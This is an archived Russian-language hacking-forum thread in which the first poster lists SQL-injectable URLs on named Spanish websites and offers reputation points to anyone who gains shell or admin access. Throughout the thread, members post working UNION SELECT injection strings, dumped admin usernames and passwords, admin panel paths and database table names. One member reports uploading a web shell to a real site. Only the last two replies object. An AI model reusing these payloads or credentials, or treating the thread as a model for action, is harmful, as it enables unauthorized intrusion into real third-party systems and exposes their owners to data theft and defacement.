PDA

Просмотр полной версии : SQL - inj на .ES сайтах, угощайтесь !11


[Dark Green]
20.11.2010, 03:07
Хекал испанские порталы и кое что осталось... Вот решил поделиться) Заодно посмотреть/проверить Ваши знания. Есть шанс немного проявить себя

За каждую скулю, раскрученную до шелла Вы получите 1-3 к грин репе и 5-15 к репе(в зависимости от способа заливки), за доступ в админку(путь к админке, логин и пасс админа) 1-2 грин репы и 1-10 репы.

тиц 40 пр7


Code:
http://www.eaea.org/es/topics.php?topic=218'

pr 5


Code:
http://www.memorimagefestival.org/es/news.php?id=43'

pr 5


Code:
http://www.elp.uji.es/news.php?id=9+and+1=0+union+select+1,2,3,4,5,6,7--

pr 4


Code:
http://www.hamo.es/es/news.php?id=21'

pr 4


Code:
http://www.vigoempresa.com/html/es/news.php?id=729'

pr 3


Code:
http://www.coupdefouet.eu/es/news.php?year=2009&month=07&id=0'

pr 3


Code:
http://http://www.look4fashion.es/es/news.php?sprog=&dage=archive&menu=ja&katagori=9'

pr 2


Code:
http://www.eiffelgres.es/news.php?id=58'

pr 2


Code:
http://www.eurotechcenter.es/news.php?act=readmore&id=271'

pr 2


Code:
http://www.natcnc.com/es/news.php?id=4&type=nccNews'

тиц 0 pr 0


Code:
http://www.franziska.es/news.php?&show_id=4&nshow=shownewscom&go=10224'

тиц 0 pr 0


Code:
http://www.mantres.es/news.php?tipo=NOTICIA&id=1+and+1=0+union+select+1,2,version(),4,5,databa se(),7,8,user(),10,11,12--

5.0.90

db1usr2484

db1usr2484@clientes.svnt.com

тиц 0 pr 0


Code:
http://www.vuototecnica.es/news.php?id=89+and+1=0+union+select+1,2,version(), 4,5,6,7,8,9--

5.0.51a-community

По итогам темы гринрепа выросла у:

GIG на 3 пункта

DCrypt +2 пункта

~dos~ +1 пункта

ubi +1 пункта

Фараон получает устное замечание/предупреждение, за оффтоп. Внимательно читай первый пост и не надо имправизаций.

Спасибо всем, кто принял участие в этой разминке)

Тему закрываем !

DCrypt
20.11.2010, 03:15
http://www.mantres.es/news.php?tipo=NOTICIA&id=1+and+1=0+union+select+1,2,version(),4,5,databa se(),7,8,user(),10,11,12--


login=admin

passw=123

Админку не могу найти.

DCrypt
20.11.2010, 03:23
Админка:

http://www.look4fashion.dk/x_admin/adgang.php

DB если что: look4fashion_dk_db

=========

DCrypt
20.11.2010, 03:41
http://www.memorimagefestival.org/es/news.php?id=43


User: docsbarc

Password: 18admin24

Админку не нашел.

=======

DCrypt
20.11.2010, 03:47
http://www.eurotechcenter.es/news.php?act=readmore&id=271


http://www.eurotechcenter.es/admin.php

Юзер: ETC

Пасс: fawaka

Залить шелл не знаю как.

=========

~d0s~
20.11.2010, 03:50
http://www.hamo.es/es/news.php?id=-21+union+select+1,2,concat_ws(0x3a,login,password) ,4,5,6,7,8,9+from+usuarios--

hamo:se73rXKXniZMM

Админку не нашел=(

DCrypt
20.11.2010, 04:08
http://www.coupdefouet.eu/es/news.php?year=2009&month=07&id=0


Админка:

http://www.coupdefouet.eu/admin/index.php

User: admin

Pass: ю«I(ђ"њАoт‚‹© (не понятно).

GIG
20.11.2010, 11:04
Админка:http://www.memorimagefestival.org/gestor/

Логин: docsbarc

Пароль:18admin24

Шелл:http://[форбиден как бы ]

ps админку запечатал чтобы не перезалили =/

ubi
20.11.2010, 11:23
Админка:

http://www.vigoempresa.com/panel/

DB: puer24

Таблицы:

ve_textos

ve_empresas_empresas_categorias

ve_empresas_categoria

ve_empresas

pv_textos

pv_news

Испанского незнаю, ничего не нашёл.

Аналогично:

Админка:

http://www.vuototecnica.es/admin

DB: vuototec_db

Таблицы:

products

product_types

newsmodul_pics

newsmodul_news

newsmodul_links

Юзеров так же не нашёл.

GIG
20.11.2010, 11:48
DCrypt said:
Ясно.
Сайт кстати поломался.
http://www.memorimagefestival.org/


знаю , главное что шелл залил

UPD - пропатчил сайт , теперь в принципе не залить шелл , восстановил админку , перезалил шелл

попугай
20.11.2010, 18:16
Это что реабилитация топика "админки"? Постить админки и шеллы тут до добра не доведет.

Kusto
20.11.2010, 18:29
как бы были такие темы и разделы- все это закончилось печально и глупо, вобщем я уверенн что через пару дней все сайты будут обезличенны, и раскрутить скулю на 5-ой ветке- ума много не надо.... вобщем еслиб было голосование я бы высказался за удаление данной темы....



P.S. Y no toca Espana por favor